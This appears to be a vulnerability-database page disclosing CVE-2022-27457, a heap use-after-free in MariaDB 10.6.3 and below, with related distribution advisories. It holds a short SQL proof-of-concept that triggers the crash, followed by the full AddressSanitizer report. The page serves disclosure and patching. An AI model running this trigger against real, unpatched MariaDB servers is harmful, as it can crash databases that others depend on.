Headline
CVE-2022-27457: [MDEV-28098] incorrect key in "dup value" error after long unique
MariaDB Server v10.6.3 and below was discovered to contain an use-after-free in the component my_mb_wc_latin1 at /strings/ctype-latin1.c.
CREATE TABLE v0 ( v3 FLOAT PRIMARY KEY NULL , v2 TEXT UNIQUE NOT NULL , v1 INT UNIQUE ) ;
CREATE TABLE v4 ( v6 INT UNIQUE UNIQUE PRIMARY KEY UNIQUE , v5 TEXT , VALUE INT NOT NULL ) ;
INSERT INTO v0 VALUES ( -32768 , -128 , 58 ) , ( -1 , 44 , -128 ) ;
INSERT INTO v4 VALUES ( 50 , 61 , -1 ) , ( -2147483648 , -128 , 0 ) ;
UPDATE v0 AS v0 SET v2 = ( NOT ( ( v1 = 8 OR ‘x’ = -1 ) IS NULL ) ) , v3 = -128 ;
UPDATE v0 AS ONE NATURAL JOIN v4 SET v1 = v2 , v5 = 0 ;
UPDATE v4 NATURAL JOIN v0 VALUE SET v5 = v3 , v1 = 83 ;
UPDATE v0 SET v2 = ‘x’ * ‘x’ , v1 = -1 WHERE v3 IN ( 16 , 36 , NULL , 0 ) ;
=================================================================
==9471==ERROR: AddressSanitizer: heap-use-after-free on address 0x6290000c3288 at pc 0x000002b12085 bp 0x7fe334a243c0 sp 0x7fe334a243b8
READ of size 1 at 0x6290000c3288 thread T16
#0 0x2b12084 in my\_mb\_wc\_latin1 /root/mariadb/strings/ctype-latin1.c:376:18
#1 0x2bd45cb in my\_convert\_using\_func /root/mariadb/strings/ctype.c:1161:18
#2 0xb5b9b7 in err\_conv(char\*, unsigned int, char const\*, unsigned int, charset\_info\_st const\*) /root/mariadb/sql/sql\_error.cc:931:10
#3 0x1a06285 in ErrBuff::set\_str(char const\*, unsigned long, charset\_info\_st const\*) const /root/mariadb/sql/sql\_error.h:852:10
#4 0x1a06285 in ErrConvString::lex\_cstring() const /root/mariadb/sql/sql\_error.h:890:12
#5 0x1a06285 in field\_unpack(String\*, Field\*, unsigned char const\*, unsigned int, bool) /root/mariadb/sql/key.cc:396:20
#6 0x1a06d36 in key\_unpack(String\*, TABLE\*, st\_key\*) /root/mariadb/sql/key.cc:441:5
#7 0x15cfdc3 in print\_keydup\_error(TABLE\*, st\_key\*, char const\*, unsigned long) /root/mariadb/sql/handler.cc:4246:5
#8 0x15d2509 in print\_keydup\_error(TABLE\*, st\_key\*, unsigned long) /root/mariadb/sql/handler.cc:4269:3
#9 0x15d2509 in handler::print\_error(int, unsigned long) /root/mariadb/sql/handler.cc:4345:9
#10 0x100e249 in multi\_update::send\_data(List<Item>&) /root/mariadb/sql/sql\_update.cc:2688:18
#11 0xdb5094 in select\_result\_sink::send\_data\_with\_check(List<Item>&, st\_select\_lex\_unit\*, unsigned long long) /root/mariadb/sql/sql\_class.h:5612:12
#12 0xdb5094 in end\_send(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:22331:9
#13 0xe315ff in evaluate\_join\_record(JOIN\*, st\_join\_table\*, int) /root/mariadb/sql/sql\_select.cc:21325:11
#14 0xd4c13a in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21095:9
#15 0xe315ff in evaluate\_join\_record(JOIN\*, st\_join\_table\*, int) /root/mariadb/sql/sql\_select.cc:21325:11
#16 0xd4c13a in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21095:9
#17 0xdc6797 in do\_select(JOIN\*, Procedure\*) /root/mariadb/sql/sql\_select.cc:20640:14
#18 0xdc6797 in JOIN::exec\_inner() /root/mariadb/sql/sql\_select.cc:4749:50
#19 0xdc344c in JOIN::exec() /root/mariadb/sql/sql\_select.cc:4527:3
#20 0xd4e4e8 in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /root/mariadb/sql/sql\_select.cc:5007:9
#21 0x1006042 in mysql\_multi\_update(THD\*, TABLE\_LIST\*, List<Item>\*, List<Item>\*, Item\*, unsigned long long, enum\_duplicates, bool, st\_select\_lex\_unit\*, st\_select\_lex\*, multi\_update\*\*) /root/mariadb/sql/sql\_update.cc:1968:8
#22 0xc682e9 in mysql\_execute\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:4486:12
#23 0xc4a67e in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /root/mariadb/sql/sql\_parse.cc:8027:18
#24 0xc41ba9 in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /root/mariadb/sql/sql\_parse.cc:1894:7
#25 0xc4b74b in do\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:1402:17
#26 0x111f9f2 in do\_handle\_one\_connection(CONNECT\*, bool) /root/mariadb/sql/sql\_connect.cc:1418:11
#27 0x111f248 in handle\_one\_connection /root/mariadb/sql/sql\_connect.cc:1312:5
#28 0x1f3f9dd in pfs\_spawn\_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#29 0x7fe35a9ff608 in start\_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread\_create.c:477:8
#30 0x7fe35a715162 in clone /build/glibc-sMfBJT/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86\_64/clone.S:95
0x6290000c3288 is located 136 bytes inside of 16512-byte region [0x6290000c3200,0x6290000c7280)
freed by thread T16 here:
#0 0x80f732 in free (/usr/local/mysql/bin/mariadbd+0x80f732)
#1 0x243e1b8 in mem\_heap\_free(mem\_block\_info\_t\*) /root/mariadb/storage/innobase/include/mem0mem.inl:419:3
#2 0x243e1b8 in row\_mysql\_prebuilt\_free\_blob\_heap(row\_prebuilt\_t\*) /root/mariadb/storage/innobase/row/row0mysql.cc:101:2
#3 0x24b554c in row\_sel\_store\_mysql\_rec(unsigned char\*, row\_prebuilt\_t\*, unsigned char const\*, dtuple\_t const\*, bool, dict\_index\_t const\*, unsigned short const\*) /root/mariadb/storage/innobase/row/row0sel.cc:3109:3
#4 0x24afa37 in row\_search\_mvcc(unsigned char\*, page\_cur\_mode\_t, row\_prebuilt\_t\*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
#5 0x21739c3 in ha\_innobase::index\_read(unsigned char\*, unsigned char const\*, unsigned int, ha\_rkey\_function) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:8970:5
#6 0x15c539a in handler::ha\_rnd\_pos(unsigned char\*, unsigned char\*) /root/mariadb/sql/handler.cc:3425:3
#7 0x1002a33 in prepare\_record\_for\_error\_message(int, TABLE\*) /root/mariadb/sql/sql\_update.cc:304:23
#8 0x100e1fd in multi\_update::send\_data(List<Item>&) /root/mariadb/sql/sql\_update.cc:2687:5
#9 0xdb5094 in select\_result\_sink::send\_data\_with\_check(List<Item>&, st\_select\_lex\_unit\*, unsigned long long) /root/mariadb/sql/sql\_class.h:5612:12
#10 0xdb5094 in end\_send(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:22331:9
#11 0xe315ff in evaluate\_join\_record(JOIN\*, st\_join\_table\*, int) /root/mariadb/sql/sql\_select.cc:21325:11
#12 0xd4c13a in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21095:9
#13 0xe315ff in evaluate\_join\_record(JOIN\*, st\_join\_table\*, int) /root/mariadb/sql/sql\_select.cc:21325:11
#14 0xd4c13a in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21095:9
#15 0xdc6797 in do\_select(JOIN\*, Procedure\*) /root/mariadb/sql/sql\_select.cc:20640:14
#16 0xdc6797 in JOIN::exec\_inner() /root/mariadb/sql/sql\_select.cc:4749:50
#17 0xdc344c in JOIN::exec() /root/mariadb/sql/sql\_select.cc:4527:3
#18 0xd4e4e8 in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /root/mariadb/sql/sql\_select.cc:5007:9
#19 0x1006042 in mysql\_multi\_update(THD\*, TABLE\_LIST\*, List<Item>\*, List<Item>\*, Item\*, unsigned long long, enum\_duplicates, bool, st\_select\_lex\_unit\*, st\_select\_lex\*, multi\_update\*\*) /root/mariadb/sql/sql\_update.cc:1968:8
#20 0xc682e9 in mysql\_execute\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:4486:12
#21 0xc4a67e in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /root/mariadb/sql/sql\_parse.cc:8027:18
#22 0xc41ba9 in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /root/mariadb/sql/sql\_parse.cc:1894:7
#23 0xc4b74b in do\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:1402:17
#24 0x111f9f2 in do\_handle\_one\_connection(CONNECT\*, bool) /root/mariadb/sql/sql\_connect.cc:1418:11
#25 0x111f248 in handle\_one\_connection /root/mariadb/sql/sql\_connect.cc:1312:5
#26 0x1f3f9dd in pfs\_spawn\_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#27 0x7fe35a9ff608 in start\_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread\_create.c:477:8
previously allocated by thread T16 here:
#0 0x80f99d in malloc (/usr/local/mysql/bin/mariadbd+0x80f99d)
#1 0x215c51e in ut\_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const\*, unsigned int, bool, bool) /root/mariadb/storage/innobase/include/ut0new.h:375:11
#2 0x2301754 in mem\_heap\_create\_block\_func(mem\_block\_info\_t\*, unsigned long, unsigned long) /root/mariadb/storage/innobase/mem/mem0mem.cc:277:37
#3 0x24be2fc in mem\_heap\_create\_func(unsigned long, unsigned long) /root/mariadb/storage/innobase/include/mem0mem.inl:377:10
#4 0x24be2fc in row\_sel\_store\_mysql\_field(unsigned char\*, row\_prebuilt\_t\*, unsigned char const\*, dict\_index\_t const\*, unsigned short const\*, unsigned long, mysql\_row\_templ\_t const\*) /root/mariadb/storage/innobase/row/row0sel.cc:3050:27
#5 0x24b4ea9 in row\_sel\_store\_mysql\_rec(unsigned char\*, row\_prebuilt\_t\*, unsigned char const\*, dtuple\_t const\*, bool, dict\_index\_t const\*, unsigned short const\*) /root/mariadb/storage/innobase/row/row0sel.cc:3196:8
#6 0x24afa37 in row\_search\_mvcc(unsigned char\*, page\_cur\_mode\_t, row\_prebuilt\_t\*, unsigned long, unsigned long) /root/mariadb/storage/innobase/row/row0sel.cc:5656:9
#7 0x21739c3 in ha\_innobase::index\_read(unsigned char\*, unsigned char const\*, unsigned int, ha\_rkey\_function) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:8970:5
#8 0x2174d99 in ha\_innobase::index\_first(unsigned char\*) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:9339:14
#9 0x2174d99 in ha\_innobase::rnd\_next(unsigned char\*) /root/mariadb/storage/innobase/handler/ha\_innodb.cc:9432:11
#10 0x15c44c3 in handler::ha\_rnd\_next(unsigned char\*) /root/mariadb/sql/handler.cc:3393:5
#11 0x930064 in rr\_sequential(READ\_RECORD\*) /root/mariadb/sql/records.cc:519:35
#12 0xd4c04d in sub\_select(JOIN\*, st\_join\_table\*, bool) /root/mariadb/sql/sql\_select.cc:21092:12
#13 0xdc6797 in do\_select(JOIN\*, Procedure\*) /root/mariadb/sql/sql\_select.cc:20640:14
#14 0xdc6797 in JOIN::exec\_inner() /root/mariadb/sql/sql\_select.cc:4749:50
#15 0xdc344c in JOIN::exec() /root/mariadb/sql/sql\_select.cc:4527:3
#16 0xd4e4e8 in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /root/mariadb/sql/sql\_select.cc:5007:9
#17 0x1006042 in mysql\_multi\_update(THD\*, TABLE\_LIST\*, List<Item>\*, List<Item>\*, Item\*, unsigned long long, enum\_duplicates, bool, st\_select\_lex\_unit\*, st\_select\_lex\*, multi\_update\*\*) /root/mariadb/sql/sql\_update.cc:1968:8
#18 0xc682e9 in mysql\_execute\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:4486:12
#19 0xc4a67e in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /root/mariadb/sql/sql\_parse.cc:8027:18
#20 0xc41ba9 in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /root/mariadb/sql/sql\_parse.cc:1894:7
#21 0xc4b74b in do\_command(THD\*, bool) /root/mariadb/sql/sql\_parse.cc:1402:17
#22 0x111f9f2 in do\_handle\_one\_connection(CONNECT\*, bool) /root/mariadb/sql/sql\_connect.cc:1418:11
#23 0x111f248 in handle\_one\_connection /root/mariadb/sql/sql\_connect.cc:1312:5
#24 0x1f3f9dd in pfs\_spawn\_thread /root/mariadb/storage/perfschema/pfs.cc:2201:3
#25 0x7fe35a9ff608 in start\_thread /build/glibc-sMfBJT/glibc-2.31/nptl/pthread\_create.c:477:8
Thread T16 created by T0 here:
#0 0x7f9cfc in pthread\_create (/usr/local/mysql/bin/mariadbd+0x7f9cfc)
#1 0x1f3fd39 in my\_thread\_create(unsigned long\*, pthread\_attr\_t const\*, void\* (\*)(void\*), void\*) /root/mariadb/storage/perfschema/my\_thread.h:52:10
#2 0x1f3fd39 in pfs\_spawn\_thread\_v1 /root/mariadb/storage/perfschema/pfs.cc:2252:15
#3 0x85cef4 in inline\_mysql\_thread\_create(unsigned int, unsigned long\*, pthread\_attr\_t const\*, void\* (\*)(void\*), void\*) /root/mariadb/include/mysql/psi/mysql\_thread.h:1139:11
#4 0x85cef4 in create\_thread\_to\_handle\_connection(CONNECT\*) /root/mariadb/sql/mysqld.cc:5975:19
#5 0x85e72a in create\_new\_thread(CONNECT\*) /root/mariadb/sql/mysqld.cc:6034:3
#6 0x85e72a in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /root/mariadb/sql/mysqld.cc:6096:5
#7 0x85a34c in handle\_connections\_sockets() /root/mariadb/sql/mysqld.cc:6220:9
#8 0x84e9ef in mysqld\_main(int, char\*\*) /root/mariadb/sql/mysqld.cc:5870:3
#9 0x7fe35a61a0b2 in \_\_libc\_start\_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /root/mariadb/strings/ctype-latin1.c:376:18 in my_mb_wc_latin1
Shadow bytes around the buggy address:
0x0c5280010600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280010610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280010620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280010630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c5280010640: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c5280010650: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280010660: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280010670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280010680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c5280010690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c52800106a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==9471==ABORTING
Related news
Gentoo Linux Security Advisory 202405-25 - Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code. Versions greater than or equal to 10.11.3:10.11 are affected.
Ubuntu Security Notice 5739-1 - Several security issues were discovered in MariaDB and this update includes new upstream MariaDB versions to fix these issues. MariaDB has been updated to 10.3.37 in Ubuntu 20.04 LTS and to 10.6.11 in Ubuntu 22.04 LTS and Ubuntu 22.10. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.
An update for galera, mariadb, and mysql-selinux is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via cert...
An update for the mariadb:10.5 module is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application crash via certain SELECT ...
An update for rh-mariadb105-galera and rh-mariadb105-mariadb is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2021-46659: mariadb: Crash executing query with VIEW, aggregate and subquery * CVE-2021-46661: mariadb: MariaDB allows an application crash in find_field_in_tables and find_order_in_list via an unused common table expression (CTE) * CVE-2021-46663: mariadb: MariaDB through 10.5.13 allows a ha_maria::extra application ...
MariaDB CONNECT Storage Engine Heap-based Buffer Overflow Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MariaDB. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of SQL queries. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the service account. Was ZDI-CAN-16190.